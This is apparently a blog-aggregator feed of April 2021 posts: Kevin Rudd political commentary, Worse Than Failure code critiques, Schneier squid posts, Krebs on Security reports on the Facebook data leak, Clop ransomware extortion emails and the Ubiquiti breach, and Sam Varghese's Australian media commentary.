Second, Australia might look to the United States, which is weeks away from producing a surplus of vaccines. After a century of alliance, partnership and camaraderie, Washington may be able to provide a top-up to at least help vaccinate our most vulnerable frontline workers with the best vaccines available.

Third, we should be learning from our friends and allies about their experiences running mass vaccination centres. One of the major challenges associated with the shift to Pfizer from AstraZeneca is that it requires colder storage facilities and, perhaps most significantly, it requires the second shot to be given about three weeks after the first (rather than about three months for AstraZeneca). The government’s plan A – to mass-vaccinate millions through GP clinics and pharmacies – always seemed far-fetched. It seems inevitable that we may now need to pivot to mass vaccination centres like those in the US.

Fourth, the government must overhaul its local production effort. The pharmaceutical industry is reportedly rife with stories of Australian officials not answering correspondence, not returning phone calls and being generally uninterested in discussing vaccine purchases until several months into the pandemic, by which time those companies had promised billions of doses to other countries.

The same attitudes appear to have driven the government’s approach to our own country’s local mRNA experts. As the Guardian reported last week, “Frustrated experts say Australia could already be producing mRNA Covid vaccines if it had acted earlier”. Any sensible government would have been moving heaven and earth to help make this happen months ago, but not Morrison it would seem.

Australians are not fools. They understand just how vulnerable we remain. And we all know that waiting until Christmas isn’t good enough. As the actor David Wenham tweeted after Morrison’s press conference on Friday, “I just rang my local Priceline pharmacy and ordered 100 million doses of Pfizer vaccine. This is great news and puts Australia at the front of the queue again.” And David, as we all know, is a better actor than Scotty from Marketing will ever be.

First published in The Guardian

Image: Mike Bowers/The Guardian

The post The Guardian: Australia’s vaccination rollout strategy has been an epic fail. Now Scott Morrison is trying to gaslight us appeared first on Kevin Rudd.

Worse Than FailureCodeSOD: Exceptionally General

Andres noticed this pattern showing up in his company's code base, and at first didn't think much of it:

try { /*code here*/ } catch (Exception ex) { ExceptionManager.HandleException(ex); throw ex; }

It's not uncommon to have some sort of exception handling framework, maybe some standard logging, or the like. And even if you're using that, it may still make sense to re-throw the exception so another layer of the application can also handle it. But there was just something about it that got Andres's attention.

So Andres did what any curious programmer would do: checked the implementation of HandleException.

public static Exception HandleException(Exception ex) { if (ex is ArgumentException) return new InvalidOperationException("(ExceptionManager) Ocurrió un error en el argumento."); if (ex is ArgumentOutOfRangeException) return new InvalidOperationException("(ExceptionManager) An error ocurred because of an out of range value."); if (ex is ArgumentNullException) return new InvalidOperationException("(ExceptionManager) On error ocurred tried to access a null value."); if (ex is InvalidOperationException) return new InvalidOperationException("(ExceptionManager) On error ocurred performing an invalid operation."); if (ex is SmtpException) return new InvalidOperationException("(ExceptionManager)An error ocurred trying to send an email."); if (ex is SqlException) return new InvalidOperationException("(ExceptionManager) An error ocurred accessing data."); if (ex is IOException) return new InvalidOperationException("(ExceptionManager) An error ocurred accesing files."); return new InvalidOperationException("(ExceptionManager) An error ocurred while trying to perform the application."); }

So, what this code is trying to do is bad: it wants to destroy all the exception information and convert actual meaningful errors into generic InvalidOperationExceptions. If this code did what it intended to do, it'd be destroying the backtrace, concealing the origin of the error, and make the application significantly harder to debug.

Fortunately, this code actually doesn't do anything. It constructs the new objects, and returns them, but that return value isn't consumed, so it just vanishes into the ether. Then our actual exception handler rethrows the original exception.

The old saying is "no harm, no foul", and while this doesn't do any harm, it's definitely quite foul.

[Advertisement] Continuously monitor your servers for configuration changes, and report when there's configuration drift. Get started with Otter today!


Kevin RuddBBC World: HRH Prince Philip

9 APRIL 2021

Topic: His Royal Highness Prince Philip, the Duke of Edinburgh

The post BBC World: HRH Prince Philip appeared first on Kevin Rudd.

Kevin RuddBBC Newsnight: HRH Prince Philip

9 APRIL 2021

Topic: His Royal Highness Prince Philip, the Duke of Edinburgh

The post BBC Newsnight: HRH Prince Philip appeared first on Kevin Rudd.


Kevin RuddStatement: HRH The Duke of Edinburgh

Thérèse and I are deeply saddened by the news of the death of His Royal Highness Prince Philip.

We would like to extend our deepest condolences to his lifelong partner Her Majesty The Queen, and other members of the Royal Family.

Prince Philip lived to a venerable age. Both Thérèse and I had the opportunity to meet and converse with both His Royal Highness and Her Majesty on a number of occasions. It was plain from those conversations that Prince Philip had a deep and abiding affection for Australia.

It matters not whether Australians are republicans or monarchists, Prince Philip’s passing is a very sad day for the Royal Family who, like all families, will be grieving deeply the loss of a loving husband, father, grandfather, and great-grandfather.

Our thoughts should all be with Her Majesty The Queen at this time.

Image: ABC / Her Royal Highness Queen Elizabeth II and the Duke of Edinburgh on Royal train at Bathurst, NSW, while on tour, February 1954.

The post Statement: HRH The Duke of Edinburgh appeared first on Kevin Rudd.

Cryptogram Friday Squid Blogging: Squid-Shaped Bike Rack

There’s a new squid-shaped bike rack in Ballard, WA.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

Cryptogram Friday Squid Blogging: Blobs of Squid Eggs Found Near Norway

Divers find three-foot “blobs” — egg sacs of the squid Illex coindetii — off the coast of Norway.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

Cryptogram Friday Squid Blogging: Jurassic Squid and Prey

A 180-million-year-old Vampire squid ancestor was fossilized along with its prey.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

Kevin RuddSubmission: Parliamentary Petitions

In February 2021, I made a written submission to the Australian House of Representatives Inquiry into aspects of its petitioning system.

The Inquiry was launched following technological failures by the Department of Parliamentary Services which resulted in many thousands of Australians being unable to sign the Petition for a Royal Commission to ensure the strength and diversity of Australian news media.

The Inquiry is also examining a malicious cyberattack on that petition by a right-wing activist, inspired by a segment he saw on Murdoch’s Sky News.

Click here to read my submission.

The post Submission: Parliamentary Petitions appeared first on Kevin Rudd.

Worse Than FailureError'd: Punfree Friday

Today's Error'd submissions are not so much WTF as simply "TF?" Please try to explain the thought process in the comments, if you can.

Plaid-hat hacker Mark writes "Just came across this for a Microsoft Security portal. Still trying to figure it out." Me, I just want to know what happens when you click "Audio".


Reader Wesley faintly damns the sender "Hey, at least they are being honest!" But is this real, or is it a phishing scam? And if it's real phishing, can it really be honest?


Surveyed David misses last week's trivial "None of the above". So do I, David.


Diligently searching, keyboard sleuth Paul T suspects his None key might be somewhere near his Any key, but he can't find that one either.


Finally, an EU resident who wishes to remain anonymous has warned us "Vodafone doesn't allow IT jokes to kids... And they might be right". Where did we go wrong, Vodafone nannies? Was it the C++?


[Advertisement] BuildMaster allows you to create a self-service release management platform that allows different teams to manage their applications. Explore how!


Worse Than FailureCodeSOD: A True Leader's Enhancement

Chuck had some perfectly acceptable C# code running in production. There was nothing terrible about it. It may not be the absolute "best" way to build this logic in terms of being easy to change and maintain in the future, but nothing about it is WTF-y.

if (report.spName == "thisReport" || report.spName == "thatReport") { LoadUI1(); } else if (report.spName == "thirdReport" || report.spName == "thirdReportButMoreSpecific") { LoadUI2(); } else { LoadUI3(); }

At worst, we could argue that using string-ly typed logic for deciding the UI state is suboptimal, but this code is hardly "burn it down" bad.

Fortunately, Chuck's team leader didn't like this code. So that team leader "fixed" it.

if ("thisReport, thatReport".Contains(report.spName)) { LoadUI1(); } else if ("thirdReport, thirdReportButMoreSpecific".Contains(spName)) { LoadUI2(); } else { LoadUI3(); }

So we keep the string-ly typed logic, but instead of straight equality comparisons, we change it into a Contains check. A Contains check on a string which contains all the possible report names, as a comma separated list. Not only is it less readable, and peforms significantly worse, but if spName is an invalid value, we might get some fun, unexpected results.

Perhaps the team lead was going for an ["array", "of", "allowed", "names"] and missed?

The end result though is that this change definitely made the code worse. The team lead, though, doesn't get their code reviewed by their peers. They're the leader, they have no peers, clearly.

[Advertisement] Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!


Worse Than FailureCodeSOD: We All Expire

Code, like anything else, ages with time. Each minor change we make to a piece of already-in-use software speeds up that process. And while a piece of software can be running for decades unchanged, its utility will still decline over time, as its user interface becomes more distant from common practices, as the requirements drift from their intent, and people forget what the original purpose of certain features even was.

Code ages, but some code is born with an expiration date.

For example, at Jose's company, each year is assigned a letter label. The reasons are obscure, and rooted in somebody's project planning process, but the year 2000 was "A". The year 2001 was "B", and so on. 2025 would be "Z", and then 2026 would roll back over to "A".

At least, that's what the requirement was. What was implemented was a bit different.

if DateTime.Today.year = 2010 then year = "K" else if DateTime.Today.year = 2011 then year = "L" else if DateTime.Today.year = 2012 then year = "M" else if DateTime.Today.year = 2013 then year = "N" else if DateTime.Today.year = 2014 then year = "O" else if DateTime.Today.year = 2015 then year = "P" else if DateTime.Today.year = 2016 then year = "Q" else if DateTime.Today.year = 2017 then year = "R" else if DateTime.Today.year = 2018 then year = "S" else if DateTime.Today.year = 2019 then year = "T" else if DateTime.Today.year = 2020 then year = "U" else if DateTime.Today.year = 2021 then year = "V" else if DateTime.Today.year = 2022 then year = "W" else if DateTime.Today.year = 2023 then year = "X" else if DateTime.Today.year = 2024 then year = "Y" else year = "Z" end if

For want of a mod, 2026 was lost. But hey, this code was clearly written in 2010, which means it will work just fine for a decade and a half. We should all be so lucky.

[Advertisement] Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!

Cryptogram Google’s Project Zero Finds a Nation-State Zero-Day Operation

Google’s Project Zero discovered, and caused to be patched, eleven zero-day exploits against Chrome, Safari, Microsoft Windows, and iOS. This seems to have been exploited by “Western government operatives actively conducting a counterterrorism operation”:

The exploits, which went back to early 2020 and used never-before-seen techniques, were “watering hole” attacks that used infected websites to deliver malware to visitors. They caught the attention of cybersecurity experts thanks to their scale, sophistication, and speed.


It’s true that Project Zero does not formally attribute hacking to specific groups. But the Threat Analysis Group, which also worked on the project, does perform attribution. Google omitted many more details than just the name of the government behind the hacks, and through that information, the teams knew internally who the hacker and targets were. It is not clear whether Google gave advance notice to government officials that they would be publicizing and shutting down the method of attack.


Krebs on SecurityAre You One of the 533M People Who Got Facebooked?

Ne’er-do-wells leaked personal data — including phone numbers — for some 553 million Facebook users this week. Facebook says the data was collected before 2020 when it changed things to prevent such information from being scraped from profiles. To my mind, this just reinforces the need to remove mobile phone numbers from all of your online accounts wherever feasible. Meanwhile, if you’re a Facebook product user and want to learn if your data was leaked, there are easy ways to find out.

The HaveIBeenPwned project, which collects and analyzes hundreds of database dumps containing information about billions of leaked accounts, has incorporated the data into his service. Facebook users can enter the mobile number (in international format) associated with their account and see if those digits were exposed in the new data dump (HIBP doesn’t show you any data, just gives you a yes/no on whether your data shows up).

The phone number associated with my late Facebook account (which I deleted in Jan. 2020) was not in HaveIBeenPwned, but then again Facebook claims to have more than 2.7 billion active monthly users.

It appears much of this database has been kicking around the cybercrime underground in one form or another since last summer at least. According to a Jan. 14, 2021 Twitter post from Under the Breach’s Alon Gal, the 533 million Facebook accounts database was first put up for sale back in June 2020, offering Facebook profile data from 100 countries, including name, mobile number, gender, occupation, city, country, and marital status.

Under The Breach also said back in January that someone had created a Telegram bot allowing users to query the database for a low fee, and enabling people to find the phone numbers linked to a large number of Facebook accounts.

A cybercrime forum ad from June 2020 selling a database of 533 Million Facebook users. Image: @UnderTheBreach

Many people may not consider their mobile phone number to be private information, but there is a world of misery that bad guys, stalkers and creeps can visit on your life just by knowing your mobile number. Sure they could call you and harass you that way, but more likely they will see how many of your other accounts — at major email providers and social networking sites like Facebook, Twitter, Instagram, e.g. — rely on that number for password resets.

From there, the target is primed for a SIM-swapping attack, where thieves trick or bribe employees at mobile phone stores into transferring ownership of the target’s phone number to a mobile device controlled by the attackers. From there, the bad guys can reset the password of any account to which that mobile number is tied, and of course intercept any one-time tokens sent to that number for the purposes of multi-factor authentication.

Or the attackers take advantage of some other privacy and security wrinkle in the way SMS text messages are handled. Last month, a security researcher showed how easy it was to abuse services aimed at helping celebrities manage their social media profiles to intercept SMS messages for any mobile user. That weakness has supposedly been patched for all the major wireless carriers now, but it really makes you question the ongoing sanity of relying on the Internet equivalent of postcards (SMS) to securely handle quite sensitive information.

My advice has long been to remove phone numbers from your online accounts wherever you can, and avoid selecting SMS or phone calls for second factor or one-time codes. Phone numbers were never designed to be identity documents, but that’s effectively what they’ve become. It’s time we stopped letting everyone treat them that way.

Any online accounts that you value should be secured with a unique and strong password, as well as the most robust form of multi-factor authentication available. Usually, this is a mobile app like Authy or Google Authenticator that generates a one-time code. Some sites like Twitter and Facebook now support even more robust options — such as physical security keys.

Removing your phone number may be even more important for any email accounts you may have. Sign up with any service online, and it will almost certainly require you to supply an email address. In nearly all cases, the person who is in control of that address can reset the password of any associated services or accounts– merely by requesting a password reset email.

Unfortunately, many email providers still let users reset their account passwords by having a link sent via text to the phone number on file for the account. So remove the phone number as a backup for your email account, and ensure a more robust second factor is selected for all available account recovery options.

Here’s the thing: Most online services require users to supply a mobile phone number when setting up the account, but do not require the number to remain associated with the account after it is established. I advise readers to remove their phone numbers from accounts wherever possible, and to take advantage of a mobile app to generate any one-time codes for multifactor authentication.

Why did KrebsOnSecurity delete its Facebook account early last year? Sure, it might have had something to do with the incessant stream of breaches, leaks and privacy betrayals by Facebook over the years. But what really bothered me were the number of people who felt comfortable sharing extraordinarily sensitive information with me on things like Facebook Messenger, all the while expecting that I can vouch for the privacy and security of that message just by virtue of my presence on the platform.

In case readers want to get in touch for any reason, my email here is krebsonsecurity at gmail dot com, or krebsonsecurity at I also respond at Krebswickr on the encrypted messaging platform Wickr.

Worse Than FailureCodeSOD: He Sed What?

Today's code is only part of the WTF. The code is bad, it's incorrect, but the mistake is simple and easy to make.

Lowell was recently digging into a broken feature in a legacy C application. The specific error was a failure when invoking a sed command from inside the application.

// use the following to remove embedded newlines: sed ':a;N;$!ba;s/\n,/,/g' snprintf(command, sizeof(command),"sed -i ':a;N;$!ba;s/\n,/,/g' %s/%s.txt",path,file); system(command);

While regular expressions have a reputation for being cryptic, this one is at least easy to read- or at least, easier to read than the pile of sed flags that precede it. s/\n,/,/g finds every newline character followed by a comma and replaces it ith just a comma. At least, that was the intent, but there's one problem with that- we're not calling sed from inside the shell.

We're calling it from C, and C is going to interpret the \n as a newline itself. The actual command which gets sent to the shell is:

sed -i ':a;N;$!ba;s/ ,/,/g' /var/tmp/backup.txt

This completely broke one of the features of this legacy application. Specifically, as you might guess from the shell command above, the backup functionality. The application had the ability to backup its data in a way that would let users revert to prior application states or migrate to other hosts. The commit which introduced the sed call broke that feature.

In 2018. For nearly three years, all of the customers running this application have been running it without backups.

Lowell sums it up:

The real WTF may be the first part of my reply: "Looks like backup was broken by a commit in December 2018. The 2014 version should work."

[Advertisement] Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!


Krebs on SecurityRansom Gangs Emailing Victim Customers for Leverage

Some of the top ransomware gangs are deploying a new pressure tactic to push more victim organizations into paying an extortion demand: Emailing the victim’s customers and partners directly, warning that their data will be leaked to the dark web unless they can convince the victim firm to pay up.

This letter is from the Clop ransomware gang, putting pressure on a recent victim named on Clop’s dark web shaming site.

“Good day! If you received this letter, you are a customer, buyer, partner or employee of [victim],” the missive reads. “The company has been hacked, data has been stolen and will soon be released as the company refuses to protect its peoples’ data.”

“We inform you that information about you will be published on the darknet [link to dark web victim shaming page] if the company does not contact us,” the message concludes. “Call or write to this store and ask to protect your privacy!!!!”

The message above was sent to a customer of RaceTrac Petroleum, an Atlanta company that operates more than 650 retail gasoline convenience stores in 12 southeastern states. The person who shared that screenshot above isn’t a distributor or partner of RaceTrac, but they said they are a RaceTrac rewards member, so the company definitely has their email address and other information.

Several gigabytes of the company’s files — including employee tax and financial records — have been posted to the victim shaming site for the Clop ransomware gang.

In response to questions from KrebsOnSecurity, RaceTrac said it was recently impacted by a security incident affecting one of its third-party service providers, Accellion Inc.

For the past few months, attackers have been exploiting a a zero-day vulnerability in Accellion File Transfer Appliance (FTA) software, a flaw that has been seized upon by Clop to break into dozens of other major companies like oil giant Shell and security firm Qualys.

“By exploiting a previously undetected software vulnerability, unauthorized parties were able to access a subset of RaceTrac data stored in the Accellion File Transfer Service, including email addresses and first names of some of our RaceTrac Rewards Loyalty users,” the company wrote. “This incident was limited to the aforementioned Accellion services and did not impact RaceTrac’s corporate network. The systems used for processing guest credit, debit and RaceTrac Rewards transactions were not impacted.”

The same extortion pressure email has been going out to people associated with the University of California, which was one of several large U.S. universities that got hit with Clop ransomware recently. Most of those university ransomware incidents appeared to be tied to attacks on attacks on the same Accellion vulnerability, and the company has acknowledged roughly a third of its customers on that appliance got compromised as a result.

Clop is one of several ransom gangs that will demand two ransoms: One for a digital key needed to unlock computers and data from file encryption, and a second to avoid having stolen data published or sold online. That means even victims who opt not to pay to get their files and servers back still have to decide whether to pay the second ransom to protect the privacy of their customers.

As I noted in Why Paying to Delete Stolen Data is Bonkers, leaving aside the notion that victims might have any real expectation the attackers will actually destroy the stolen data, new research suggests a fair number of victims who do pay up may see some or all of the stolen data published anyway.

The email in the screenshot above differs slightly from those covered last week by Bleeping Computer, which was the first to spot the new victim notification wrinkle. Those emails say that the recipient is being contacted as they are a customer of the store, and their personal data, including phone numbers, email addresses, and credit card information, will soon be published if the store does not pay a ransom, writes Lawrence Abrams.

“Perhaps you bought something there and left your personal data. Such as phone, email, address, credit card information and social security number,” the Clop gang states in the email.

Fabian Wosar, chief technology officer at computer security firm Emsisoft, said the direct appeals to victim customers is a natural extension of other advertising efforts by the ransomware gangs, which recently included using hacked Facebook accounts to post victim shaming advertisements.

Wosar said Clop isn’t the only ransomware gang emailing victim customers.

“Clop likes to do it and I think REvil started as well,” Wosar said.

Earlier this month, Bleeping Computer reported that the REvil ransomware operation was planning on launching crippling distributed denial of service (DDoS) attacks against victims, or making VOIP calls to victims’ customers to apply further pressure.

“Sadly, regardless of whether a ransom is paid, consumers whose data has been stolen are still at risk as there is no way of knowing if ransomware gangs delete the data as they promise,” Abrams wrote.

Cory DoctorowHow To Destroy Surveillance Capitalism (Part 01)

This week on my podcast, part one of a serialized reading of my 2020 Onezero/Medium book How To Destroy Surveillance Capitalism, now available in paperback (you can also order signed and personalized copies from Dark Delicacies, my local bookstore).


Worse Than FailureCodeSOD: Switching Your Template

Many years ago, Kari got a job at one of those small companies that lives in the shadow of a university. It was founded by graduates of that university, mostly recruited from that university, and the CEO was a fixture at alumni events.

Kari was a rare hire not from that university, but she knew the school had a reputation for having an excellent software engineering program. She was prepared to be a little behind her fellow employees, skills-wise, but looked forward to catching up.

Kari was unprepared for the kind of code quality these developers produced.

First, let's take a look at how they, as a company standard, leveraged C++ templates. C++ templates are similar (though more complicated) than the generics you find in other languages. Defining a method like void myfunction<T>(T param) creates a function which can be applied to any type, so myfunction(5) and myfunction("a string") and myfunction(someClassVariable) are all valid. The beauty, of course, is that you can write a template method once, but use it in many ways.

Kari provided some generic examples of how her employer leveraged this feature, to give us a sense of what the codebase was like:

enum SomeType { SOMETYPE_TYPE1 // ... more types here }; template<SomeType t> void Function1(); template<> void Function1<SOMETYPE_TYPE1>() { // Implementation of Function1 for TYPE1 as a template specialization } template<> void Function1<SOMETYPE_TYPE2>() { // Implementation of Function1 for TYPE2 as a template specialization } // ... more specializations here void CallFunction1(SomeType type) { switch(type) { case SOMETYPE_TYPE1: Function1<SOMETYPE_TYPE1>(); break; case SOMETYPE_TYPE2: Function1<SOMETYPE_TYPE2>(); break; // ... I think you get the picture default: assert(false); break; } }

This technique allows them to define multiple versions of a method call Function1, and then decide which version needs to be invoked by using a type flag and a switch statement. This simultaneously misses the point of templates and overloading. And honestly, while I'm not sure exactly what business problem they were trying to solve, this is a textbook case for using polymorphism to dispatch calls to concrete implementations via inheritance.

Which raises the question, if this is how they do templates, how do they do inheritance? Oh, you know how they do inheritance.

enum ClassType { CLASSTYPE_CHILD1 // ... more enum values here }; class Parent { public: Parent(ClassType type) : type_(type) { } ClassType get_type() const { return type_; } bool IsXYZSupported() const { switch(type_) { case CHILD1: return true; // ... more cases here default: assert(false); return false; } } private: ClassType type_; }; class Child1 : public Parent { public: Child1() : Parent(CLASSTYPE_CHILD1) { } }; // Somewhere else in the application, buried deep within hundreds of lines of obscurity... bool IsABCSupported(Parent *obj) { switch(obj->get_type()) { case CLASSTYPE_CHILD1: return true; // ... more cases here default: assert(false); return false; } }

Yes, once again, we have a type flag and a switch statement. Inheritance would do this for us. They're reinvented the wheel, but this time, it's a triangle. An isosceles triangle, at that.

All that's bad, but the thing which elevates this code to transcendentally bad are the locations of the definitions of IsXYZSupported and IsABCSupported. IsXYZSupported is unnecessary, something which shouldn't exist, but at least it's in the definition of the class. Well, it's in the definition of the parent class, which means the parent has to know each of its children, which opens up a whole can of worms regarding fragility. But there are also stray methods like IsABCSupported, defined someplace else, to do something else, and this means that doing any tampering to the class hierarchy means tracking down possibly hundreds of random methods scattered in the code base.

And, if you're wondering how long these switch statements could get? Kari says: "The record I saw was a switch with approximately 100 cases."

[Advertisement] Continuously monitor your servers for configuration changes, and report when there's configuration drift. Get started with Otter today!


Krebs on SecurityUbiquiti All But Confirms Breach Response Iniquity

For four days this past week, Internet-of-Things giant Ubiquiti did not respond to requests for comment on a whistleblower’s allegations the company had massively downplayed a “catastrophic” two-month breach ending in January to save its stock price, and that Ubiquiti’s insinuation that a third-party was to blame was a fabrication. I was happy to add their eventual public response to the top of Tuesday’s story on the whistleblower’s claims, but their statement deserves a post of its own because it actually confirms and reinforces those claims.

Ubiquiti’s IoT gear includes things like WiFi routers, security cameras, and network video recorders. Their products have long been popular with security nerds and DIY types because they make it easy for users to build their own internal IoT networks without spending many thousands of dollars.

But some of that shine started to come off recently for Ubiquiti’s more security-conscious customers after the company began pushing everyone to use a unified authentication and access solution that makes it difficult to administer these devices without first authenticating to Ubiquiti’s cloud infrastructure.

All of a sudden, local-only networks were being connected to Ubiquiti’s cloud, giving rise to countless discussion threads on Ubiquiti’s user forums from customers upset over the potential for introducing new security risks.

And on Jan. 11, Ubiquiti gave weight to that angst: It told customers to reset their passwords and enable multifactor authentication, saying a breach involving a third-party cloud provider might have exposed user account data. Ubiquiti told customers they were “not currently aware of evidence of access to any databases that host user data, but we cannot be certain that user data has not been exposed.”

Ubiquiti’s notice on Jan. 12, 2021.

On Tuesday, KrebsOnSecurity reported that a source who participated in the response to the breach said Ubiquiti should have immediately invalidated all credentials because all of the company’s key administrator passwords had been compromised as well. The whistleblower also said Ubiquiti never kept any logs of who was accessing its databases.

The whistleblower, “Adam,” spoke on condition of anonymity for fear of reprisals from Ubiquiti. Adam said the place where those key administrator credentials were compromised — Ubiquiti’s presence on Amazon’s Web Services (AWS) cloud services — was in fact the “third party” blamed for the hack.

From Tuesday’s piece:

“In reality, Adam said, the attackers had gained administrative access to Ubiquiti’s servers at Amazon’s cloud service, which secures the underlying server hardware and software but requires the cloud tenant (client) to secure access to any data stored there.

“They were able to get cryptographic secrets for single sign-on cookies and remote access, full source code control contents, and signing keys exfiltration,” Adam said.

Adam says the attacker(s) had access to privileged credentials that were previously stored in the LastPass account of a Ubiquiti IT employee, and gained root administrator access to all Ubiquiti AWS accounts, including all S3 data buckets, all application logs, all databases, all user database credentials, and secrets required to forge single sign-on (SSO) cookies.

Such access could have allowed the intruders to remotely authenticate to countless Ubiquiti cloud-based devices around the world. According to its website, Ubiquiti has shipped more than 85 million devices that play a key role in networking infrastructure in over 200 countries and territories worldwide.

Ubiquiti finally responded on Mar. 31, in a post signed “Team UI” on the company’s community forum online.

“Nothing has changed with respect to our analysis of customer data and the security of our products since our notification on January 11. In response to this incident, we leveraged external incident response experts to conduct a thorough investigation to ensure the attacker was locked out of our systems.”

“These experts identified no evidence that customer information was accessed, or even targeted. The attacker, who unsuccessfully attempted to extort the company by threatening to release stolen source code and specific IT credentials, never claimed to have accessed any customer information. This, along with other evidence, is why we believe that customer data was not the target of, or otherwise accessed in connection with, the incident.”

Ubiquiti’s response this week on its user forum.

Ubiquiti also hinted it had an idea of who was behind the attack, saying it has “well-developed evidence that the perpetrator is an individual with intricate knowledge of our cloud infrastructure. As we are cooperating with law enforcement in an ongoing investigation, we cannot comment further.”

Ubiquiti’s statement largely confirmed the reporting here by not disputing any of the facts raised in the piece. And while it may seem that Ubiquiti is quibbling over whether data was in fact stolen, Adam said Ubiquiti can say there is no evidence that customer information was accessed because Ubiquiti failed to keep logs of who was accessing its databases.

“Ubiquiti had negligent logging (no access logging on databases) so it was unable to prove or disprove what they accessed, but the attacker targeted the credentials to the databases, and created Linux instances with networking connectivity to said databases,” Adam wrote in a whistleblower letter to European privacy regulators last month. “Legal overrode the repeated requests to force rotation of all customer credentials, and to revert any device access permission changes within the relevant period.”

It appears investors noticed the incongruity as well. Ubiquiti’s share price hardly blinked at the January breach disclosure. On the contrary, from Jan. 13 to Tuesday’s story its stock had soared from $243 to $370. By the end of trading day Mar. 30, UI had slipped to $349. By close of trading on Thursday (markets were closed Friday) the stock had fallen to $289.

Sam VargheseTime for ABC to bite the bullet and bring Tony Jones back to Q+A

Finally, someone from the mainstream Australian media has called it: Q+A, once one of the more popular shows on the ABC, is really not worth watching any more.

Of course, being Australian, the manner in which this sentiment was expressed was oblique, more so given that it came from a critic who writes for the Nine newspapers, Craig Mathieson.

Hamish Macdonald: his immature approach to Q+A has led to the program going downhill. Courtesy YouTube

A second critical review has appeared on April 5, this time in The Australian.

Newspapers from this company are generally classed as being from the left — they once were, when they were owned by Fairfax Media, but centrist or right of centre would be more accurate these days — and given that the ABC is also considered to be part of the left, criticism was generally absent.

Mathieson did not come right out and call the program atrocious – which is what it is right now. The way the headline on Mathieson’s article put it was that Q+A was once an agenda setter, but was no longer essential viewing. He was right about the former, but to call it essential viewing at any stage of its existence is probably an exaggeration.

He cited viewing figures to bolster his views: “Audience figures for Q+A have plummeted this year. Last week [25 March], it failed to crack the top 20 free-to-air programs on the Thursday night it aired, indicating a capital city audience of just 237,000. In March 2020, the number was above 500,000, and likewise in March 2016,” he wrote.

“This was meant to be the year that Q+A ascended to new prominence. Since its debut in 2008 it had aired about 9.30pm on Mondays, the feisty debate chaser to Four Corners and Media Watch.

“In 2021, it moved to 8.30pm on Thursday, an hour earlier presumably to give it access to a larger audience and its own anchoring role on the ABC’s schedule. But even with Back Roads, one of the national broadcaster’s quiet achievers, as an 8pm lead-in, the viewing figures are starting to resemble a death spiral.”

Veteran ABC journalist Tony Jones was the Q+A host until just two seasons ago. Then Hamish Macdonald, from the tabloid TV channel 10, was given the job. And things have generally gone downhill from that point onwards.

Courtesy The Australian

Jones brought a mature outlook to the show and was generally able to keep the discussion interesting. he always had things in check and the panellists were kept in line when they tried to ramble on. Quite often, the show was prevented from going down a difficult path by a simple “I’ll take that as a comment” from Jones.

Macdonald often loses control of things. He seems to be trying too hard to differentiate himself from Jones, bringing too many angles to a single episode and generally trying to engineer gotcha situations. It turns to be quite juvenile. One word describes him: callow. It is one that can be applied to many of the ABC’s recent recruits.

Had the previous host been anyone but Jones, the difference would not have been so stark. But then even when others like Virginia Trioli or Annabel Crabb stood in for Jones, the show was watchable as nobody tried out gimmicks. Again, Trioli and Crabb are very good at their jobs. The same cannot be said for Macdonald.

Now that Jones has had to put his plan of accompanying his partner, Sarah Ferguson, to China, the ABC might like to think of bringing him back to Q+A. The plan was for to Ferguson to be the ABC’s regular correspondent in China, but that was dropped after the previous correspondent, Bill Birtles, fled the country last September, along with Michael Smith, a correspondent for the Australian Financial Review. Jones had planned to write a book while in China.

The ABC needs to bite the bullet and rescue what was once one of its flagship shows. As Mathieson did, it is worthwhile pointing out that two other popular shows, 7.30 and Four Corners, have held their own during the same period that Q+A has gone downhill, even improving on previous audience numbers.

If change does come it would be at the end of this season. Another season of Macdonald will mean that Q+A may have to be pensioned off like Lateline which was killed largely because the main host, Emma Alberici, had made it into a terrible program. Under Jones, and others like Maxine McKew, Trioli and even the comparatively younger Stephen Cannane, Lateline was always compulsory watching for any Australian who followed news somewhat seriously.


Sam VargheseAFR’s Aaron Patrick shows us what gutter journalism is all about

Australian journalists often criticise each other, with those on the right tending to go for those on the left and vice versa. But, generally, in these stoushes, details of people’s private lives are not revealed.

But there are exceptions, and one of those was witnessed on March 31, when Aaron Patrick, the senior correspondent with the Australian Financial Review, took a swing at Samantha Maiden, a reporter with, a free site operated by News Corporation, over coverage of numerous issues around women. (News Corporation’s other sites are all paywalled.)

In February, Maiden exposed the story of a young Liberal staffer, Brittany Higgins, who had been allegedly raped by a colleague in Parliament House some two years ago.

And then this month, after an ABC journalist Louise Milligan had written about an unnamed senior politician who was accused of an alleged rape some 30-plus years ago, Maiden revealed a large number of additional details about the case, something which Patrick dubbed “intimate and compelling information“.

The takeoff point for Patrick was his claim that women pursuing these cases are “activists”. Apparently, he does not think that women have news sense and are producing some of the stronger stories in the media because they are simply better at their jobs than the countless men.

Patrick used Prime Minister Scott Morrison’s reaction at a media conference when asked about standards in Parliament House as some kind of a lede. Sky News’ staffer Andrew Clennell had asked Morrison: “Prime Minister, if you’re the boss at a business and there had been an alleged rape on your watch and this incident we heard about last night on your watch, your job would probably be in a bit of jeopardy, wouldn’t it? Doesn’t it look like you have lost control of your ministerial staff?”

When Morrison suggested that standards in other workplaces could also be faulted, Clennell did not give up, saying: “Well, they’re better than these I would suggest, Prime Minister.”

To which Morrison, who has a short fuse, retorted: “Let me take you up on that Let me take you up on that. Right now, you would be aware that in your own organisation that there is a person who has had a complaint made against them for harassment of a woman in a women’s toilet and that matter is being pursued by your own HR department.”

What he was referring to was an exchange of words between Maiden and a reporter named Jade Gailberger who works for the News Corporation internal wire service. Maiden, according to Patrick, wanted someone else to be on the federal parliamentary press gallery committee, rather than Gailberger. So some words were exchanged.

Morrison’s mischaracterisation was not allowed to stand, with the boss of News Corporation shooting it down in a strongly worded press release the same night.

Then Patrick, perhaps feeling he had set the scene, reached into the gutter, revealing personal details about Maiden, which have nothing to do with her reporting ability (which, even a cynic like me, would rate as damn good).

In Australia (and most of the West), there is a kind of fake politeness that dominates the workplace, and Patrick appears to want Maiden to conform to this. The fact that she works best on her own — “fellow journalists… said she did not prize teamwork and intimidated younger reporters, male and female” — is a big negative to him.

